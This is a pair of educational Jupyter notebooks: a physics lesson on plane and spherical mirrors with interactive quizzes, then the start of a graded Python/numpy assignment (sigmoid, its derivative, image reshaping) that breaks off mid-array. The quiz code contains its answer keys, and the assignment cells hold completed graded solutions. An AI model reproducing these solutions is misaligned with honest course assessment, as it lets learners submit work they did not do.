the mirror, the image of the object will also move toward the mirror such that the object and the image are always equidistant from the surface of the mirror. Use the slider below to change the object distance. Notice how the image distance also changes when the slider is moved.
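For example, if you stand 2 m in front of a plane mirror, your image appears to be located 2 m behind the mirror, so a total of 4 m separates you from your image.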
###Code
interactive_plot = widgets.interactive(f,Distance=widgets.IntSlider(value=30,min=10,max=50,step=10,continuous_update=False))
output = interactive_plot.children[-1]
output.layout.height = '280px'
interactive_plot
#Print question
distance = round(random.uniform(5,10),1)
print("If you stand " + str(distance) + " m in front of a plane mirror, how many metres behind the mirror is your virtual image?")
#Answer calculation
answer = distance
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " m"
option_2 = str(round((answer * 2),1)) + " m"
option_3 = str(round((answer / 2),1)) + " m"
option_4 = str(round((answer / 4),1)) + " m"
multiple_choice(option_1, option_2, option_3, option_4)
#Print question
distance = round(random.uniform(5,10),1)
print("If you stand " + str(distance) + " m in front of a plane mirror, how many metres will separate you from your virtual image?")
#Answer calculation
answer = (distance * 2)
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " m"
option_2 = str(round((answer * 2),1)) + " m"
option_3 = str(round((answer / 2),1)) + " m"
option_4 = str(round((answer / 4),1)) + " m"
multiple_choice(option_1, option_2, option_3, option_4)
###Output
If you stand 6.8 m in front of a plane mirror, how many metres will separate you from your virtual image?
[1m(A) [0;0m13.6 m
[1m(B) [0;0m6.8 m
[1m(C) [0;0m27.2 m
[1m(D) [0;0m3.4 m
###Markdown
Spherical Mirrors Two common types of curved mirror are formed from a section of a sphere. If the reflection takes place on the inside of the spherical section, then the mirror is called a **concave mirror**. The reflecting surface of a concave mirror curves inward and away from the viewer. If the reflection takes place on the outside of the spherical section, then the mirror is called a **convex mirror**. The reflecting surface of a convex mirror curves outward and toward the viewer. The **centre of curvature, $C$,** is the point located at the centre of the sphere used to create the mirror. The **vertex, $V$,** is the point located at the geometric centre of the mirror itself. The **focus, $F$,** is the point located midway between the centre of curvature and the vertex. The line passing through the centre of curvature and the vertex is called the **principal axis**. Notice that the focus also lies on the principal axis. When an incident ray parallel to the principal axis strikes the mirror, the reflected ray always passes through the focus. When an incident ray passes through the focus and strikes the mirror, the reflected ray is always parallel to the principal axis. (In the above diagrams, reverse the arrow directions to see this case.) These properties make the focus particularly useful when examining spherical mirrors. **Note:** The distance from the centre of curvature to the vertex is equal to the **radius, $R$,** of the sphere used to create the mirror. Any straight line drawn from the centre to any point on the surface of a spherical mirror will have a length equal to the radius. The distance from the vertex to the focus is called the **focal length, $f$**. This distance is equal to half the radius. $$f = \frac{R}{2}$$
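For example, a mirror cut from a sphere with a radius of curvature of $R = 20$ cm has a focal length of $f = \frac{20 \text{ cm}}{2} = 10$ cm.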
###Code
#Print question
radius = round(random.uniform(10,30),1)
print("If the radius of a curved mirror is " + str(radius) + " cm, how many centimetres is the focal length?")
#Answer calculation
answer = radius/2
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " cm"
option_2 = str(round((answer * 2),1)) + " cm"
option_3 = str(round((answer / 2),1)) + " cm"
option_4 = str(round((answer * 4),1)) + " cm"
multiple_choice(option_1, option_2, option_3, option_4)
#Print question
focal_length = round(random.uniform(5,15),1)
print("If the focal length of a curved mirror is " + str(focal_length) + " cm, how many centimetres is the radius of curvature?")
#Answer calculation
answer = focal_length*2
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = str(round((answer),1)) + " cm"
option_2 = str(round((answer * 2),1)) + " cm"
option_3 = str(round((answer / 2),1)) + " cm"
option_4 = str(round((answer / 4),1)) + " cm"
multiple_choice(option_1, option_2, option_3, option_4)
###Output
If the focal length of a curved mirror is 6.1 cm, how many centimetres is the radius of curvature?
[1m(A) [0;0m3.0 cm
[1m(B) [0;0m24.4 cm
[1m(C) [0;0m6.1 cm
[1m(D) [0;0m12.2 cm
###Markdown
Image Formation by Spherical Mirrors A simple way to determine the position and characteristics of an image formed by the rays reflected from a spherical mirror is to construct a **ray diagram**. A ray diagram is used to show the path taken by light rays as they reflect from an object or mirror. This was used to find the image created by a plane mirror in the previous section. When constructing a ray diagram, we need only concern ourselves with finding the location of a single point on the reflected image. To do this, any point on the object may be chosen, but for consistency, we will choose the topmost point for the diagrams shown below. Any rays may be chosen, but there are three particular rays that are easy to draw:* **Ray 1:** This ray is drawn parallel to the principal axis from a point on the object to the surface of the mirror. Since the incident ray is parallel to the principal axis, the reflected ray must pass through the focus. * **Ray 2:** This ray is drawn from a point on the object and through the focus. Since the incident ray passes through the focus, the reflected ray must be parallel to the principal axis. * **Ray 3:** This ray is drawn from a point on the object and through the centre of curvature. This ray is therefore perpendicular to the mirror's surface (incident angle = 0). As such, the reflected ray must return along the same path and pass through the centre of curvature. The point at which any two of these three rays converge can be used to find the location and characteristics of the reflected image. Concave Mirrors The characteristics of an image formed in a concave mirror depend on the position of the object. There are essentially five cases. Each of these five cases is demonstrated below: Case 1: Object Located at a Distance Greater than $C$ In the first case, the distance of the object from the mirror is greater than the radius used to define the centre of curvature. In other words, the object is further away from the mirror than the centre of curvature. In this example, we can draw any two of the three rays mentioned above to find the image of the reflected object. **Note:** You only need to draw two of the three rays to find the image of the reflected object.
###Code
output_case_1 = widgets.Output()
frame_case_1 = 1
#Toggle images
def show_svg_case_1():
global frame_case_1
if frame_case_1 == 0:
display(SVG("Images/case_1_0.svg"))
frame_case_1 = 1
elif frame_case_1 == 1:
display(SVG("Images/case_1_1.svg"))
frame_case_1 = 2
elif frame_case_1 == 2:
display(SVG("Images/case_1_2.svg"))
frame_case_1 = 3
elif frame_case_1 == 3:
display(SVG("Images/case_1_3.svg"))
frame_case_1 = 0
button_case_1 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_1)
def on_submit_button_case_1_clicked(b):
with output_case_1:
clear_output(wait=True)
show_svg_case_1()
with output_case_1:
display(SVG("Images/case_1_0.svg"))
button_case_1.on_click(on_submit_button_case_1_clicked)
display(output_case_1)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown1_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown1_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown1_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown1_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container1_1 = widgets.VBox(children=[dropdown1_1,dropdown1_2])
container1_2 = widgets.VBox(children=[dropdown1_3,dropdown1_4])
display(widgets.HBox(children=[container1_1, container1_2])), print(" ", end='\r')
#Evaluate input
def check_answer1(b):
answer1_1 = dropdown1_1.label
answer1_2 = dropdown1_2.label
answer1_3 = dropdown1_3.label
answer1_4 = dropdown1_4.label
if answer1_1 == "Between C and F" and answer1_2 == "Smaller than the object" and answer1_3 == "Inverted" and answer1_4 == "Real":
print("Correct! ", end='\r')
elif answer1_1 != ' ' and answer1_2 != ' ' and answer1_3 != ' ' and answer1_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown1_1.observe(check_answer1, names='value')
dropdown1_2.observe(check_answer1, names='value')
dropdown1_3.observe(check_answer1, names='value')
dropdown1_4.observe(check_answer1, names='value')
###Output
_____no_output_____
###Markdown
Case 2: Object Located at $C$ In the second case, the distance of the object from the mirror is equal to the radius used to define the centre of curvature. In other words, the object is located at the centre of curvature. In this case, we can draw only two rays to find the image of the reflected object. We cannot draw a ray passing through the centre of curvature because the object is located at $C$.
###Code
output_case_2 = widgets.Output()
frame_case_2 = 1
#Toggle images
def show_svg_case_2():
global frame_case_2
if frame_case_2 == 0:
display(SVG("Images/case_2_0.svg"))
frame_case_2 = 1
elif frame_case_2 == 1:
display(SVG("Images/case_2_1.svg"))
frame_case_2 = 2
elif frame_case_2 == 2:
display(SVG("Images/case_2_2.svg"))
frame_case_2 = 0
button_case_2 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_2)
def on_submit_button_case_2_clicked(b):
with output_case_2:
clear_output(wait=True)
show_svg_case_2()
with output_case_2:
display(SVG("Images/case_2_0.svg"))
button_case_2.on_click(on_submit_button_case_2_clicked)
display(output_case_2)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown2_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown2_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown2_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown2_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container2_1 = widgets.VBox(children=[dropdown2_1,dropdown2_2])
container2_2 = widgets.VBox(children=[dropdown2_3,dropdown2_4])
display(widgets.HBox(children=[container2_1, container2_2])), print(" ", end='\r')
#Evaluate input
def check_answer2(b):
answer2_1 = dropdown2_1.label
answer2_2 = dropdown2_2.label
answer2_3 = dropdown2_3.label
answer2_4 = dropdown2_4.label
if answer2_1 == "At C" and answer2_2 == "Same size as the object" and answer2_3 == "Inverted" and answer2_4 == "Real":
print("Correct! ", end='\r')
elif answer2_1 != ' ' and answer2_2 != ' ' and answer2_3 != ' ' and answer2_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown2_1.observe(check_answer2, names='value')
dropdown2_2.observe(check_answer2, names='value')
dropdown2_3.observe(check_answer2, names='value')
dropdown2_4.observe(check_answer2, names='value')
###Output
_____no_output_____
###Markdown
Case 3: Object Located between $C$ and $F$ In the third case, the distance of the object from the mirror is less than the radius used to define the centre of curvature, but greater than the focal length. In other words, the object is located between $F$ and $C$. In this case, we can find the image of the reflected object using two rays as shown below. If the mirror is large enough, a third ray that passes through $C$ can also be drawn.
###Code
output_case_3 = widgets.Output()
frame_case_3 = 1
#Toggle images
def show_svg_case_3():
global frame_case_3
if frame_case_3 == 0:
display(SVG("Images/case_3_0.svg"))
frame_case_3 = 1
elif frame_case_3 == 1:
display(SVG("Images/case_3_1.svg"))
frame_case_3 = 2
elif frame_case_3 == 2:
display(SVG("Images/case_3_2.svg"))
frame_case_3 = 0
button_case_3 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_3)
def on_submit_button_case_3_clicked(b):
with output_case_3:
clear_output(wait=True)
show_svg_case_3()
with output_case_3:
display(SVG("Images/case_3_0.svg"))
button_case_3.on_click(on_submit_button_case_3_clicked)
display(output_case_3)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown3_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown3_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown3_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown3_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container3_1 = widgets.VBox(children=[dropdown3_1,dropdown3_2])
container3_2 = widgets.VBox(children=[dropdown3_3,dropdown3_4])
display(widgets.HBox(children=[container3_1, container3_2])), print(" ", end='\r')
#Evaluate input
def check_answer3(b):
answer3_1 = dropdown3_1.label
answer3_2 = dropdown3_2.label
answer3_3 = dropdown3_3.label
answer3_4 = dropdown3_4.label
if answer3_1 == "Beyond C" and answer3_2 == "Larger than the object" and answer3_3 == "Inverted" and answer3_4 == "Real":
print("Correct! ", end='\r')
elif answer3_1 != ' ' and answer3_2 != ' ' and answer3_3 != ' ' and answer3_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown3_1.observe(check_answer3, names='value')
dropdown3_2.observe(check_answer3, names='value')
dropdown3_3.observe(check_answer3, names='value')
dropdown3_4.observe(check_answer3, names='value')
###Output
_____no_output_____
###Markdown
Case 4: Object Located at $F$ In the fourth case, the distance of the object from the mirror is equal to the focal length. In other words, the object is located at the focus. In this case, we can draw only two rays to find the image of the reflected object. We cannot draw a ray passing through the focus because the object is located at $F$. Notice that the reflected rays are parallel and therefore do not intersect. As a consequence, no image is formed.
###Code
output_case_4 = widgets.Output()
frame_case_4 = 1
#Toggle images
def show_svg_case_4():
global frame_case_4
if frame_case_4 == 0:
display(SVG("Images/case_4_0.svg"))
frame_case_4 = 1
elif frame_case_4 == 1:
display(SVG("Images/case_4_1.svg"))
frame_case_4 = 2
elif frame_case_4 == 2:
display(SVG("Images/case_4_2.svg"))
frame_case_4 = 0
button_case_4 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_4)
def on_submit_button_case_4_clicked(b):
with output_case_4:
clear_output(wait=True)
show_svg_case_4()
with output_case_4:
display(SVG("Images/case_4_0.svg"))
button_case_4.on_click(on_submit_button_case_4_clicked)
display(output_case_4)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown4_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown4_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown4_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown4_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container4_1 = widgets.VBox(children=[dropdown4_1,dropdown4_2])
container4_2 = widgets.VBox(children=[dropdown4_3,dropdown4_4])
display(widgets.HBox(children=[container4_1, container4_2])), print(" ", end='\r')
#Evaluate input
def check_answer4(b):
answer4_1 = dropdown4_1.label
answer4_2 = dropdown4_2.label
answer4_3 = dropdown4_3.label
answer4_4 = dropdown4_4.label
if answer4_1 == "Not applicable (no image)" and answer4_2 == "Not applicable (no image)" and answer4_3 == "Not applicable (no image)" and answer4_4 == "Not applicable (no image)":
print("Correct! ", end='\r')
elif answer4_1 != ' ' and answer4_2 != ' ' and answer4_3 != ' ' and answer4_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown4_1.observe(check_answer4, names='value')
dropdown4_2.observe(check_answer4, names='value')
dropdown4_3.observe(check_answer4, names='value')
dropdown4_4.observe(check_answer4, names='value')
###Output
_____no_output_____
###Markdown
Case 5: Object Located between $F$ and $V$ In the fifth case, the distance of the object from the mirror is less than the focal length. In other words, the object is located between $F$ and $V$. In this case, we can find the image of the reflected object using two rays as shown below. Notice that the reflected rays do not actually converge. However, the projections of the reflected rays *do* converge behind the mirror. Therefore, a virtual image is formed.
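The mirror equation tells the same story numerically: with $d_o < f$, the image distance $d_i$ comes out negative, signalling a virtual image behind the mirror, and the magnification $m = -d_i/d_o$ is positive and greater than $1$ (upright and enlarged). The next cell is an illustrative addition with hypothetical values.
###Code
#Illustrative check (added): concave mirror with the object between F and V
f = 10.0 #focal length in cm (hypothetical value)
d_o = 5.0 #object distance smaller than f (hypothetical value)
d_i = 1.0/(1.0/f - 1.0/d_o) #mirror equation solved for the image distance
m = -d_i/d_o #magnification
print("d_i = %.1f cm (negative, so the image is virtual)" % d_i)
print("m = %.1f (positive and greater than 1: upright and enlarged)" % m)
###Output
_____no_output_____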
###Code
output_case_5 = widgets.Output()
frame_case_5 = 1
#Toggle images
def show_svg_case_5():
global frame_case_5
if frame_case_5 == 0:
display(SVG("Images/case_5_0.svg"))
frame_case_5 = 1
elif frame_case_5 == 1:
display(SVG("Images/case_5_1.svg"))
frame_case_5 = 2
elif frame_case_5 == 2:
display(SVG("Images/case_5_2.svg"))
frame_case_5 = 0
button_case_5 = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_case_5)
def on_submit_button_case_5_clicked(b):
with output_case_5:
clear_output(wait=True)
show_svg_case_5()
with output_case_5:
display(SVG("Images/case_5_0.svg"))
button_case_5.on_click(on_submit_button_case_5_clicked)
display(output_case_5)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown5_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown5_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown5_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown5_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container5_1 = widgets.VBox(children=[dropdown5_1,dropdown5_2])
container5_2 = widgets.VBox(children=[dropdown5_3,dropdown5_4])
display(widgets.HBox(children=[container5_1, container5_2])), print(" ", end='\r')
#Evaluate input
def check_answer5(b):
answer5_1 = dropdown5_1.label
answer5_2 = dropdown5_2.label
answer5_3 = dropdown5_3.label
answer5_4 = dropdown5_4.label
if answer5_1 == "Beyond V" and answer5_2 == "Larger than the object" and answer5_3 == "Upright" and answer5_4 == "Virtual":
print("Correct! ", end='\r')
elif answer5_1 != ' ' and answer5_2 != ' ' and answer5_3 != ' ' and answer5_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown5_1.observe(check_answer5, names='value')
dropdown5_2.observe(check_answer5, names='value')
dropdown5_3.observe(check_answer5, names='value')
dropdown5_4.observe(check_answer5, names='value')
###Output
_____no_output_____
###Markdown
Convex Mirrors For reflections in convex mirrors, the location of the object does not change the general characteristics of the image. The image will always be between $F$ and $V$, smaller than the object, upright, and virtual.
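In the sign convention where a convex mirror has a negative focal length, the mirror equation reproduces this behaviour for any object distance: $d_i$ is always negative (virtual) with $|d_i| < |f|$ (between $F$ and $V$), and the magnification satisfies $0 < m < 1$ (upright and smaller than the object). The next cell is an illustrative addition with hypothetical values.
###Code
#Illustrative check (added): convex mirror (negative focal length) for several object distances
f = -10.0 #focal length in cm (hypothetical value)
for d_o in [5.0, 10.0, 20.0, 40.0]:
    d_i = 1.0/(1.0/f - 1.0/d_o) #mirror equation solved for the image distance
    m = -d_i/d_o #magnification
    print("d_o = %5.1f cm -> d_i = %6.2f cm, m = %4.2f" % (d_o, d_i, m))
###Output
_____no_output_____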
###Code
output_convex = widgets.Output()
frame_convex = 1
#Toggle images
def show_svg_convex():
global frame_convex
if frame_convex == 0:
display(SVG("Images/convex_mirror_reflection_0.svg"))
frame_convex = 1
elif frame_convex == 1:
display(SVG("Images/convex_mirror_reflection_1.svg"))
frame_convex = 2
elif frame_convex == 2:
display(SVG("Images/convex_mirror_reflection_2.svg"))
frame_convex = 0
button_convex = widgets.Button(description="Toggle rays", button_style = 'success')
display(button_convex)
def on_submit_button_convex_clicked(b):
with output_convex:
clear_output(wait=True)
show_svg_convex()
with output_convex:
display(SVG("Images/convex_mirror_reflection_0.svg"))
button_convex.on_click(on_submit_button_convex_clicked)
display(output_convex)
###Output
_____no_output_____
###Markdown
**Question:** *Which options from the dropdown menus best describe the image formed by the reflected rays shown above?*
###Code
#Create dropdown menus
dropdown6_1 = widgets.Dropdown(options={' ':0,'Beyond C': 1, 'At C': 2, 'Between C and F': 3, 'At F': 4, 'Between F and V': 5, 'Beyond V': 6, 'Not applicable (no image)': 7}, value=0, description='Position',)
dropdown6_2 = widgets.Dropdown(options={' ':0,'Larger than the object': 1, 'Same size as the object': 2, 'Smaller than the object': 3, 'Not applicable (no image)': 4}, value=0, description='Relative size',)
dropdown6_3 = widgets.Dropdown(options={' ':0,'Upright': 1, 'Inverted': 2, 'Not applicable (no image)': 3}, value=0, description='Orientation',)
dropdown6_4 = widgets.Dropdown(options={' ':0,'Real': 1, 'Virtual': 2, 'Not applicable (no image)': 3}, value=0, description='Type',)
#Display menus as 2x2 table
container6_1 = widgets.VBox(children=[dropdown6_1,dropdown6_2])
container6_2 = widgets.VBox(children=[dropdown6_3,dropdown6_4])
display(widgets.HBox(children=[container6_1, container6_2])), print(" ", end='\r')
#Evaluate input
def check_answer6(b):
answer6_1 = dropdown6_1.label
answer6_2 = dropdown6_2.label
answer6_3 = dropdown6_3.label
answer6_4 = dropdown6_4.label
if answer6_1 == "Between F and V" and answer6_2 == "Smaller than the object" and answer6_3 == "Upright" and answer6_4 == "Virtual":
print("Correct! ", end='\r')
elif answer6_1 != ' ' and answer6_2 != ' ' and answer6_3 != ' ' and answer6_4 != ' ':
print("Try again.", end='\r')
else:
print(" ", end='\r')
dropdown6_1.observe(check_answer6, names='value')
dropdown6_2.observe(check_answer6, names='value')
dropdown6_3.observe(check_answer6, names='value')
dropdown6_4.observe(check_answer6, names='value')
###Output
_____no_output_____ |
MOOCS/Deeplearing_Specialization/Notebooks/Python Basics With Numpy v3.ipynb | ###Markdown
Python Basics with Numpy (optional assignment) Welcome to your first assignment. This exercise gives you a brief introduction to Python. Even if you've used Python before, this will help familiarize you with functions we'll need. **Instructions:**- You will be using Python 3.- Avoid using for-loops and while-loops, unless you are explicitly told to do so.- Do not modify the (# GRADED FUNCTION [function name]) comment in some cells. Your work would not be graded if you change this. Each cell containing that comment should only contain one function.- After coding your function, run the cell right below it to check if your result is correct.**After this assignment you will:**- Be able to use iPython Notebooks- Be able to use numpy functions and numpy matrix/vector operations- Understand the concept of "broadcasting"- Be able to vectorize code Let's get started! About iPython Notebooks iPython Notebooks are interactive coding environments embedded in a webpage. You will be using iPython notebooks in this class. You only need to write code between the ### START CODE HERE ### and ### END CODE HERE ### comments. After writing your code, you can run the cell by either pressing "SHIFT"+"ENTER" or by clicking on "Run Cell" (denoted by a play symbol) in the upper bar of the notebook. We will often specify "(≈ X lines of code)" in the comments to tell you about how much code you need to write. It is just a rough estimate, so don't feel bad if your code is longer or shorter.**Exercise**: Set test to `"Hello World"` in the cell below to print "Hello World" and run the two cells below.
###Code
### START CODE HERE ### (≈ 1 line of code)
test = 'Hello World'
### END CODE HERE ###
print ("test: " + test)
###Output
test: Hello World
###Markdown
**Expected output**:test: Hello World **What you need to remember**:- Run your cells using SHIFT+ENTER (or "Run cell")- Write code in the designated areas using Python 3 only- Do not modify the code outside of the designated areas 1 - Building basic functions with numpy Numpy is the main package for scientific computing in Python. It is maintained by a large community (www.numpy.org). In this exercise you will learn several key numpy functions such as np.exp, np.log, and np.reshape. You will need to know how to use these functions for future assignments. 1.1 - sigmoid function, np.exp() Before using np.exp(), you will use math.exp() to implement the sigmoid function. You will then see why np.exp() is preferable to math.exp().**Exercise**: Build a function that returns the sigmoid of a real number x. Use math.exp(x) for the exponential function.**Reminder**:$sigmoid(x) = \frac{1}{1+e^{-x}}$ is sometimes also known as the logistic function. It is a non-linear function used not only in Machine Learning (Logistic Regression), but also in Deep Learning.To refer to a function belonging to a specific package you could call it using package_name.function(). Run the code below to see an example with math.exp().
###Code
# GRADED FUNCTION: basic_sigmoid
import math
def basic_sigmoid(x):
"""
Compute sigmoid of x.
Arguments:
x -- A scalar
Return:
s -- sigmoid(x)
"""
### START CODE HERE ### (≈ 1 line of code)
s = 1 / (1 + math.exp(-x))
### END CODE HERE ###
return s
basic_sigmoid(3)
###Output
_____no_output_____
###Markdown
**Expected Output**: ** basic_sigmoid(3) ** 0.9525741268224334 Actually, we rarely use the "math" library in deep learning because the inputs of the functions are real numbers. In deep learning we mostly use matrices and vectors. This is why numpy is more useful.
###Code
### One reason why we use "numpy" instead of "math" in Deep Learning ###
x = [1, 2, 3]
#basic_sigmoid(x) # you will see this give an error when you run it, because x is a vector.
###Output
_____no_output_____
###Markdown
In fact, if $ x = (x_1, x_2, ..., x_n)$ is a row vector then $np.exp(x)$ will apply the exponential function to every element of x. The output will thus be: $np.exp(x) = (e^{x_1}, e^{x_2}, ..., e^{x_n})$
###Code
import numpy as np
# example of np.exp
x = np.array([1, 2, 3])
print(np.exp(x)) # result is (exp(1), exp(2), exp(3))
###Output
[ 2.71828183 7.3890561 20.08553692]
###Markdown
Furthermore, if x is a vector, then a Python operation such as $s = x + 3$ or $s = \frac{1}{x}$ will output s as a vector of the same size as x.
###Code
# example of vector operation
x = np.array([1, 2, 3])
print (x + 3)
###Output
[4 5 6]
###Markdown
Any time you need more info on a numpy function, we encourage you to look at [the official documentation](https://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.exp.html). You can also create a new cell in the notebook and write `np.exp?` (for example) to get quick access to the documentation.**Exercise**: Implement the sigmoid function using numpy. **Instructions**: x could now be either a real number, a vector, or a matrix. The data structures we use in numpy to represent these shapes (vectors, matrices...) are called numpy arrays. You don't need to know more for now.$$ \text{For } x \in \mathbb{R}^n \text{, } sigmoid(x) = sigmoid\begin{pmatrix} x_1 \\ x_2 \\ ... \\ x_n \\\end{pmatrix} = \begin{pmatrix} \frac{1}{1+e^{-x_1}} \\ \frac{1}{1+e^{-x_2}} \\ ... \\ \frac{1}{1+e^{-x_n}} \\\end{pmatrix}\tag{1} $$
###Code
# GRADED FUNCTION: sigmoid
import numpy as np # this means you can access numpy functions by writing np.function() instead of numpy.function()
def sigmoid(x):
"""
Compute the sigmoid of x
Arguments:
x -- A scalar or numpy array of any size
Return:
s -- sigmoid(x)
"""
### START CODE HERE ### (≈ 1 line of code)
s = 1 / (1 + np.exp(-x))
### END CODE HERE ###
return s
x = np.array([1, 2, 3])
sigmoid(x)
###Output
_____no_output_____
###Markdown
**Expected Output**: **sigmoid([1,2,3])** array([ 0.73105858, 0.88079708, 0.95257413]) 1.2 - Sigmoid gradientAs you've seen in lecture, you will need to compute gradients to optimize loss functions using backpropagation. Let's code your first gradient function.**Exercise**: Implement the function sigmoid_grad() to compute the gradient of the sigmoid function with respect to its input x. The formula is: $$sigmoid\_derivative(x) = \sigma'(x) = \sigma(x) (1 - \sigma(x))\tag{2}$$You often code this function in two steps:1. Set s to be the sigmoid of x. You might find your sigmoid(x) function useful.2. Compute $\sigma'(x) = s(1-s)$
###Code
# GRADED FUNCTION: sigmoid_derivative
def sigmoid_derivative(x):
"""
Compute the gradient (also called the slope or derivative) of the sigmoid function with respect to its input x.
You can store the output of the sigmoid function into variables and then use it to calculate the gradient.
Arguments:
x -- A scalar or numpy array
Return:
ds -- Your computed gradient.
"""
### START CODE HERE ### (≈ 2 lines of code)
s = sigmoid(x)
ds = s * (1 - s)
### END CODE HERE ###
return ds
x = np.array([1, 2, 3])
print ("sigmoid_derivative(x) = " + str(sigmoid_derivative(x)))
###Output
sigmoid_derivative(x) = [0.19661193 0.10499359 0.04517666]
###Markdown
**Expected Output**: **sigmoid_derivative([1,2,3])** [ 0.19661193 0.10499359 0.04517666] 1.3 - Reshaping arrays Two common numpy functions used in deep learning are [np.shape](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) and [np.reshape()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html). - X.shape is used to get the shape (dimension) of a matrix/vector X. - X.reshape(...) is used to reshape X into some other dimension. For example, in computer science, an image is represented by a 3D array of shape $(length, height, depth = 3)$. However, when you read an image as the input of an algorithm you convert it to a vector of shape $(length*height*3, 1)$. In other words, you "unroll", or reshape, the 3D array into a 1D vector. **Exercise**: Implement `image2vector()` that takes an input of shape (length, height, 3) and returns a vector of shape (length\*height\*3, 1). For example, if you would like to reshape an array v of shape (a, b, c) into a vector of shape (a*b, c) you would do: ```python v = v.reshape((v.shape[0]*v.shape[1], v.shape[2])) # v.shape[0] = a ; v.shape[1] = b ; v.shape[2] = c ``` - Please don't hardcode the dimensions of image as a constant. Instead look up the quantities you need with `image.shape[0]`, etc.
###Code
# GRADED FUNCTION: image2vector
def image2vector(image):
"""
Argument:
image -- a numpy array of shape (length, height, depth)
Returns:
v -- a vector of shape (length*height*depth, 1)
"""
### START CODE HERE ### (≈ 1 line of code)
    length, height, depth = image.shape
tot_size = length * height * depth
v = image.reshape((tot_size, 1))
### END CODE HERE ###
return v
# This is a 3 by 3 by 2 array, typically images will be (num_px_x, num_px_y,3) where 3 represents the RGB values
image = np.array([[[ 0.67826139, 0.29380381],
[ 0.90714982, 0.52835647],
[ 0.4215251 , 0.45017551]],
[[ 0.92814219, 0.96677647],
